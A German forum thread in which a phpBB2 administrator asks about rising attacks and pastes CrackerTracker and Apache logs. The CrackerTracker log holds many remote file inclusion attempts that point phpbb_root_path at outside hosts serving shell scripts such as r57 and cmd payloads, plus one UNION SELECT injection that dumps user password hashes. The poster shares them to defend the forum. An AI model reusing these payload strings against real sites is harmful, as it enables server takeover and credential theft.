Stark ansteigende Zahl von Angriffen auf php-Forum

  • Thread starter Thread starter blob
  • Start date Start date
B

blob

Guest
Anders als früher sind in den letzten 2 Wochen fragliche Vorfälle bzgl. meinem php-Forum stark angestiegen.

Das Sicherheitssystem meldet mehr als 50 abgefangene Angriffe. Und im http-Protokoll sind zahlreiche POST -Einträge mit 1xx und 2xx als Rückgabecode. Die meisten Meldungen betreffen profile.php , login.php, submit.php, profile.php , posting.php , kontakt-post.php.

Nur, im Forum sind keine ungeklärten Beiträge, PN's usw. Und ich habe jetzt mal mit diff die /phpBB2 -Ordner der installierten Foren mit dem entpackten Original-phpBB2.tar.gz verglichen und keine unklaren Differenzen gefunden, sodaß das php-Forum-Programm jedenfalls nicht korrumpiert ist

Aber trotzdem finde ich das komisch und will mal fragen, ob Grund zur Beunruhigung besteht und was man ggf. zum besseren Schutz machen kann. Ebenso würde mich mal interessieren, ob außer im phpBB2-Programm, auch in Daten die in den mysql-Tabellen abgelegt werden, schädliche Korruptionen auftreten können
 
Bei mir läuft php plus 1.53 basiert auf php 2.0.20 , ich habe aber bisherige Sicherheits-Patchs angebracht

Hier das Protokoll vom CrackerTracker:



Datum / Zeit
IP
Angriffsart
Referrer
User Agent
Code:
16.01.2008, 00:08 74.52.169.116 sid=ccef4ac96e9fee37dfc38175f3d22412/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.obsbeekbergen.nl/starnet/modules/sn_studentpages/check.txt? ctl_referrer libwww-perl/5.79 
13.01.2008, 17:22 74.200.220.153 action=toplist&list=newest//language/lang_english/lang_main_album.php?phpbb_root_path=http://rafb.net/p/EzIZAM24.txt?? ctl_referrer libwww-perl/5.808 
13.01.2008, 16:49 74.200.220.153 action=toplist&list=newest//language/lang_german/lang_main_album.php?phpbb_root_path=http://rafb.net/p/EzIZAM24.txt?? ctl_referrer libwww-perl/5.808 
07.01.2008, 11:34 80.236.220.184 t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/* ctl_referrer Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 
06.01.2008, 14:25 195.7.124.194 phpbb_root_path=http://www.musikverein-lohnsburg.at/echo? ctl_referrer libwww-perl/5.805 
06.01.2008, 05:56 81.88.110.251 p=http%3A%2F%2Fwww.psgonline.pl%2Fwiadomosci%2Fwiadomosci%2Fxuvuz%2Fuki%2F ctl_referrer Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) 
05.01.2008, 16:27 87.118.114.21 action=search&sid=bfa81791095e3b8835cb70fecc743614//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? ctl_referrer libwww-perl/5.79 
05.01.2008, 02:47 83.166.220.177 sid=ef3a93d7b9c35b2e1fa51e461e015f4a//language/lang_english/lang_main_album.php?phpbb_root_path=http://winstonwings.org/webcalendar/tools/cmd? ctl_referrer libwww-perl/5.808 
05.01.2008, 02:43 206.131.229.160 sid=ef3a93d7b9c35b2e1fa51e461e015f4a//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? ctl_referrer libwww-perl/5.79 
05.01.2008, 02:39 91.151.108.73 sid=ef3a93d7b9c35b2e1fa51e461e015f4a//language/lang_english/lang_main_album.php?phpbb_root_path=http://winstonwings.org/webcalendar/tools/check? ctl_referrer libwww-perl/5.79 
05.01.2008, 02:37 207.58.166.9 sid=ef3a93d7b9c35b2e1fa51e461e015f4a//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? ctl_referrer libwww-perl/5.805 
05.01.2008, 02:37 67.15.8.80 sid=ef3a93d7b9c35b2e1fa51e461e015f4a//language/lang_english/lang_main_album.php?phpbb_root_path=http://winstonwings.org/webcalendar/tools/check? ctl_referrer libwww-perl/5.65 
05.01.2008, 02:36 67.15.109.113 sid=ef3a93d7b9c35b2e1fa51e461e015f4a//language/lang_english/lang_main_album.php?phpbb_root_path=http://winstonwings.org/webcalendar/tools/cmd? ctl_referrer libwww-perl/5.65 
05.01.2008, 02:36 206.55.125.228 sid=ef3a93d7b9c35b2e1fa51e461e015f4a//language/lang_english/lang_main_album.php?phpbb_root_path=http://winstonwings.org/webcalendar/tools/check? ctl_referrer libwww-perl/5.65 
05.01.2008, 02:33 72.37.160.17 sid=ef3a93d7b9c35b2e1fa51e461e015f4a//language/lang_english/lang_main_album.php?phpbb_root_path=http://winstonwings.org/webcalendar/tools/cmd? ctl_referrer libwww-perl/5.79 
04.01.2008, 15:15 207.58.166.9 sid=ef3a93d7b9c35b2e1fa51e461e015f4a//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.dycdallas.org/ecalendar/ws/aa.txt? ctl_referrer libwww-perl/5.805 
30.12.2007, 11:26 64.38.11.122 option=com_smf&Itemid=43&topic=1&mosConfig_absolute_path=http://www.midsouthhomebuyersweb.com//modules/Forums/main.txt? ctl_referrer libwww-perl/5.808 
30.12.2007, 11:26 64.38.11.122 option=com_smf&Itemid=43&topic=1&mosConfig_absolute_path=http://www.midsouthhomebuyersweb.com//modules/Forums/main.txt? ctl_referrer libwww-perl/5.808 
26.12.2007, 23:53 156.3.74.18 phpbb_root_path=http://www.sv98rosbach.de/pr.txt? ctl_referrer libwww-perl/5.805 
24.12.2007, 19:13 72.36.177.194 phpbb_root_path=http://www.sv98rosbach.de/pr.txt? ctl_referrer libwww-perl/5.808 
23.12.2007, 22:47 69.64.49.252 action=toplist&list=newest//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.tukangbecak.com/r57.pdf??? ctl_referrer libwww-perl/5.805 
23.12.2007, 22:38 85.119.157.176 action=toplist&list=newest//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.tukangbecak.com/r57.pdf??? ctl_referrer libwww-perl/5.48 
20.12.2007, 19:46 85.17.199.21 f=2&sid=9681bf9cc8af48c0594c392306bb1f52//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.rce-bay.com/shop/shop.txt? ctl_referrer libwww-perl/5.808 
20.12.2007, 19:44 85.17.199.21 f=2&sid=9681bf9cc8af48c0594c392306bb1f52//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.rce-bay.com/shop/shop.txt? ctl_referrer libwww-perl/5.808 
18.12.2007, 09:13 67.15.10.34 f=2&sid=b06df71d25ada8a3c3caf6bc84c7d4ca//language/lang_german/lang_main_album.php?phpbb_root_path=http://rafb.net/p/LiU01935.txt?? ctl_referrer libwww-perl/5.65 
17.12.2007, 14:21 67.15.10.34 f=2&sid=b06df71d25ada8a3c3caf6bc84c7d4ca//language/lang_english/lang_main_album.php?phpbb_root_path=http://rafb.net/p/LiU01935.txt?? ctl_referrer libwww-perl/5.65 
28.11.2007, 16:20 62.75.189.48 t=pop&sid=2610dfbf91fc36e75f434c48765e4420//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.cesi666.de/diablo2/modules/vwar/cache/contr2.txt?? ctl_referrer libwww-perl/5.803 
28.11.2007, 16:15 62.75.189.48 t=pop&sid=2610dfbf91fc36e75f434c48765e4420//modules/Forums/favorites.php?nuke_bb_root_path=http://www.cesi666.de/diablo2/modules/vwar/cache/contr2.txt?? ctl_referrer libwww-perl/5.803 
25.11.2007, 14:27 62.75.189.48 cat_id=2//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dilara-joleene.de/phpBB2//language/lang_german/pr.txt?? ctl_referrer libwww-perl/5.803 
25.11.2007, 14:26 62.75.189.48 phpbb_root_path=http://www.dilara-joleene.de/phpBB2//language/lang_german/pr.txt?? ctl_referrer libwww-perl/5.803 
20.11.2007, 23:36 189.12.168.198 p=http://www.yourpath.smtp.ru/tool25.dat?&cmd=id ctl_referrer
20.11.2007, 15:53 87.106.9.138 t=pop&sid=2610dfbf91fc36e75f434c48765e4420//includes/functions_mod_user.php?phpbb_root_path=http://www.myhost.helloweb.eu/test.txt?? ctl_referrer libwww-perl/5.803 
20.11.2007, 15:51 87.106.9.138 start=20071110&sid=18c2518087e6dd156a115ee061b11dec//includes/functions_mod_user.php?phpbb_root_path=http://www.myhost.helloweb.eu/test.txt?? ctl_referrer libwww-perl/5.803 
20.11.2007, 15:19 87.106.9.138 t=pop&sid=2610dfbf91fc36e75f434c48765e4420//includes/functions_mod_user.php?phpbb_root_path=http://www.myhost.helloweb.eu/test.txt?? ctl_referrer libwww-perl/5.803 
20.11.2007, 15:16 87.106.9.138 start=20071110&sid=18c2518087e6dd156a115ee061b11dec//includes/functions_mod_user.php?phpbb_root_path=http://www.myhost.helloweb.eu/test.txt?? ctl_referrer libwww-perl/5.803 
19.11.2007, 06:54 87.118.106.34 sid=f96eba1447acf3c6554ae3fca708c9fa//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? ctl_referrer libwww-perl/5.65 
18.11.2007, 17:00 72.36.164.122 start=20071110&sid=18c2518087e6dd156a115ee061b11dec//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.allo-montreal.com/calendar//crotz.txt? ctl_referrer libwww-perl/5.808 
18.11.2007, 08:32 85.25.23.133 start=20071110&sid=18c2518087e6dd156a115ee061b11dec//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.clangamer.de//vwar/convert/pr.txt?? ctl_referrer libwww-perl/5.803 
18.11.2007, 08:01 85.25.23.133 start=20071110&sid=18c2518087e6dd156a115ee061b11dec//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.clangamer.de//vwar/convert/pr.txt?? ctl_referrer libwww-perl/5.803 
16.11.2007, 17:41 87.118.106.34 sid=f96eba1447acf3c6554ae3fca708c9fa//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? ctl_referrer libwww-perl/5.65 
16.11.2007, 10:09 209.216.205.192 phpbb_root_path=http://www.tokyowww.com/alat/echo? ctl_referrer libwww-perl/5.79 
14.11.2007, 08:11 69.89.21.80 sid=61da20384c7c47ee2e782b3f3db7e7df//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? ctl_referrer libwww-perl/5.808 
08.11.2007, 13:41 87.118.106.153 sid=8a9279d29350ffb80cdcd5046f968612//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.myhost.helloweb.eu/test.txt?? ctl_referrer libwww-perl/5.803 
04.11.2007, 21:06 62.75.202.243 f=4&sid=9b78c545bdad20d4f34f33113ae9d3f9//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.remax-topmakelaars.nl/gallery2/modules/useralbum/locale/eu/LC_MESSAGES/prs.txt? ctl_referrer Mozilla/5.0 
04.11.2007, 13:02 62.75.208.14 mode=stats&stats=latest&sid=74c4267d3397610d5b89ee426cb281c4//language/lang_german/lang_main_album.php?phpbb_root_path=http://kingologay2.altervista.org/priv8/test.txt?? ctl_referrer libwww-perl/5.69 
04.11.2007, 02:20 70.84.186.226 phpbb_root_path=http://www.orderofronin.com/vb/impex/cmd.txt? ctl_referrer libwww-perl/5.65 
04.11.2007, 02:15 70.84.186.226 start=20070930/includes/functions.php?phpbb_root_path=http://www.orderofronin.com/vb/impex/cmd.txt? ctl_referrer libwww-perl/5.65 
02.11.2007, 20:03 67.15.229.26 phpbb_root_path=http://www.superlab.jazztel.es/safe.gif? ctl_referrer libwww-perl/5.79 
02.11.2007, 19:49 81.16.171.9 sid=f96eba1447acf3c6554ae3fca708c9fa/lang_main_album.php?phpbb_root_path=http://www.woman.fromland.net//language/lang_german/r8.txt? ctl_referrer libwww-perl/5.79 
28.10.2007, 18:40 74.53.121.130 phpbb_root_path=http://keplek.100webspace.net/id.txt? ctl_referrer libwww-perl/5.808 
28.10.2007, 15:56 216.195.34.165 phpbb_root_path=http://www.ak07-rs-neustadt.de/chat/help.txt? ctl_referrer libwww-perl/5.64 
26.09.2007, 18:32 82.165.43.184 phpbb_root_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? ctl_referrer libwww-perl/5.76 
26.09.2007, 18:24 82.165.43.184 phpbb_root_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? ctl_referrer libwww-perl/5.76 
25.09.2007, 18:55 72.9.144.10 phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? ctl_referrer libwww-perl/5.79 
21.09.2007, 09:43 218.103.35.18 phpbb_root_path=http://www.anglersweb.de/images/emporium/products/media/id.txt?

MOD : Bitte Code Tags verwenden. Danke.
 
Last edited by a moderator:
Hier Auszug aus den log -Files, die letzten beiden Einträge von meinem eigenem Zugriff zum Vergleich:
Code:
76.168.51.19 - - [03/Sep/2007:20:58:11 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
76.168.51.19 - - [03/Sep/2007:20:58:18 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
24.131.212.124 - - [04/Sep/2007:18:26:26 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]"
24.131.212.124 - - [04/Sep/2007:18:26:31 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]"
72.36.250.34 - - [06/Sep/2007:02:01:42 -0300] "POST /geeklog/submit.php HTTP/1.0" 200 10614 "http://www.copaya.yi.org/geeklog/submit.php?type=story" "Opera/9.01 (Windows NT 5.1; U; en)"
194.150.174.50 - - [12/Sep/2007:01:27:35 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=posting.php&mode=reply&t=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
82.230.82.38 - - [15/Sep/2007:20:04:57 -0300] "POST /geeklog/submit.php HTTP/1.0" 200 10614 "http://www.copaya.yi.org/geeklog/submit.php?type=story" "Opera/9.00 (Windows NT 4.0; U; en)"
98.199.229.174 - - [20/Sep/2007:07:44:45 -0300] "POST /geeklog/trackback.php?id=welcome HTTP/1.0" 403 155 "http://www.copaya.yi.org/geeklog/article.php?story=welcome" "-- WordPress/2.1-alpha3"
71.192.164.79 - - [20/Sep/2007:08:50:51 -0300] "POST /geeklog/trackback.php?id=welcome HTTP/1.0" 403 155 "http://www.copaya.yi.org/geeklog/article.php?story=welcome" "-- WordPress/2.1-alpha3"
81.248.42.174 - - [25/Sep/2007:12:05:56 -0300] "POST /phpBB2/dload.php HTTP/1.1" 200 3655 "http://www.copaya.yi.org/phpBB2/dload.php?action=search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; EmbeddedWB 14,52 from: [URL="http://www.bsalsa.com/"]bsalsa EmbeddedWB Home[/URL] Embedded Web Browser from: http://bsalsa.com/)"
222.240.208.14 - - [27/Sep/2007:21:45:14 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15423 "http://www.copaya.yi.org/phpBB2/login.php?redirect=posting.php&mode=newtopic&f=7" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051102 Firefox/1.6a1"
69.126.9.143 - - [17/Oct/2007:11:14:46 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)"
69.126.9.143 - - [17/Oct/2007:11:14:52 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; BCD2000)"
60.190.79.18 - - [17/Oct/2007:12:57:13 -0300] "POST /phpBB2/profile.php?sid=465c8f4a321c1a0794105dab2013feb0 HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/antirobot_pic.php?id=4&sid=465c8f4a321c1a0794105dab2013feb0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2"
60.190.79.18 - - [17/Oct/2007:12:57:39 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2"
210.42.39.3 - - [18/Oct/2007:23:35:34 -0300] "POST /phpBB2/profile.php?sid=7d5bf396779632cf72aed37623d61423 HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
210.42.39.3 - - [18/Oct/2007:23:35:43 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
192.168.1.8 - - [19/Oct/2007:22:25:17 -0300] "POST /be/ HTTP/1.1" 200 813 "http://copaya.yi.org/be/" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.21.5-smp; X11; i686; pt_BR, en_US) KHTML/3.5.7 (like Gecko)"
80.8.242.92 - - [26/Oct/2007:13:10:37 -0300] "POST /phpBB2/login.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/login.php?sid=aee508d135219c06e3aab5c662a3fb4c" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.141.52.219 - - [27/Oct/2007:05:16:00 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
206.57.118.34 - - [27/Oct/2007:19:44:20 -0300] "POST /phpBB2/profile.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
195.244.128.240 - - [29/Oct/2007:10:52:54 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060602 Firefox/1.5.0.4"
195.244.128.240 - - [29/Oct/2007:10:53:29 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060602 Firefox/1.5.0.4"
62.141.52.219 - - [29/Oct/2007:22:02:09 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Opera/9.01 (Windows NT 5.1; U; en)"
195.244.128.240 - - [30/Oct/2007:09:34:17 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
195.244.128.240 - - [30/Oct/2007:09:34:24 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
85.137.97.166 - - [30/Oct/2007:23:51:49 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
59.108.74.195 - - [31/Oct/2007:16:04:33 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true&sid=f3007b105049a6fb65ee6ca21dd95c42" "Mozilla/4.0 (compatible; MSIE 5.0; Win3.1; ATHMWWW1.1;)"
201.9.206.65 - - [02/Nov/2007:10:00:42 -0300] "POST /phpBB2/login.php HTTP/1.1" 200 3744 "http://www.copaya.yi.org/phpBB2/index.php?sid=53a142bd09d10941614e6342c362c792" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"
69.149.101.20 - - [02/Nov/2007:18:08:57 -0300] "POST /phpBB2/profile.php?sid=148b0438bdd843d827068b2c8d414ee4 HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/0.91 Beta (Windows)"
59.108.74.195 - - [05/Nov/2007:10:16:19 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2) Gecko/20021126"
123.176.84.27 - - [06/Nov/2007:14:42:24 -0300] "POST /phpBB2/profile.php?sid=530ed3af38853a9c08dc59ee0ff22233 HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0"
210.73.88.144 - - [06/Nov/2007:21:50:47 -0300] "POST /phpBB2/posting.php HTTP/1.1" 302 - "http://www.copaya.yi.org/phpBB2/viewtopic.php?t=6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
218.206.12.39 - - [07/Nov/2007:15:32:57 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"
83.175.191.106 - - [08/Nov/2007:08:55:51 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/0.6 Beta (Windows)"
83.175.191.106 - - [08/Nov/2007:08:56:25 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/0.6 Beta (Windows)"
87.118.106.4 - - [09/Nov/2007:22:13:34 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; ICS 1.2.105)"
78.107.217.144 - - [10/Nov/2007:14:09:24 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
78.107.217.144 - - [10/Nov/2007:14:09:44 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15385 "http://www.copaya.yi.org/phpBB2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
193.111.120.47 - - [10/Nov/2007:19:28:28 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01"
64.27.28.154 - - [11/Nov/2007:08:00:46 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Mac_PowerPC Mac OS X; en) Opera 8.0"
202.70.201.34 - - [12/Nov/2007:06:48:09 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
202.70.201.34 - - [12/Nov/2007:06:48:19 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/5.0 (Windows; U; Win95; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
24.244.248.40 - - [12/Nov/2007:22:30:06 -0300] "POST /phpBB2/profile.php?sid=e6632b53f2a3dda7f982db1e54798502 HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7) Gecko/20040630 Firefox/0.9.1"
60.190.79.18 - - [16/Nov/2007:17:13:27 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
60.190.79.18 - - [16/Nov/2007:17:13:42 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
212.0.109.103 - - [18/Nov/2007:18:39:51 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)"
212.0.109.103 - - [18/Nov/2007:18:40:03 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)"
87.106.135.26 - - [20/Nov/2007:18:32:38 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1"
87.106.135.26 - - [20/Nov/2007:18:32:45 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-GB; rv:1.7.6) Gecko/20050222 Firefox/1.0.1"
89.149.236.51 - - [21/Nov/2007:08:19:57 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.5) Gecko/20011011"
89.149.236.51 - - [21/Nov/2007:08:20:03 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.5) Gecko/20011011"
123.232.108.98 - - [22/Nov/2007:05:00:48 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)"
123.232.108.98 - - [22/Nov/2007:05:01:07 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)"
77.50.7.167 - - [08/Dec/2007:00:46:11 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/antirobot_pic.php?id=5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:"
77.50.7.167 - - [08/Dec/2007:00:46:28 -0300] "POST /phpBB2/login.php HTTP/1.0" 200 15417 "http://www.copaya.yi.org/phpBB2/login.php?redirect=profile.php&mode=signature" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:"
159.148.229.75 - - [08/Dec/2007:16:18:56 -0300] "POST /phpBB2/login.php?sid=8a3b4a45132e2e9ef847833e732b6e15 HTTP/1.1" 200 15365 "-" "Mozilla/5.0"
84.19.188.11 - - [11/Dec/2007:13:17:33 -0300] "POST /phpBB2/profile.php HTTP/1.0" 302 - "http://www.copaya.yi.org/phpBB2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50"
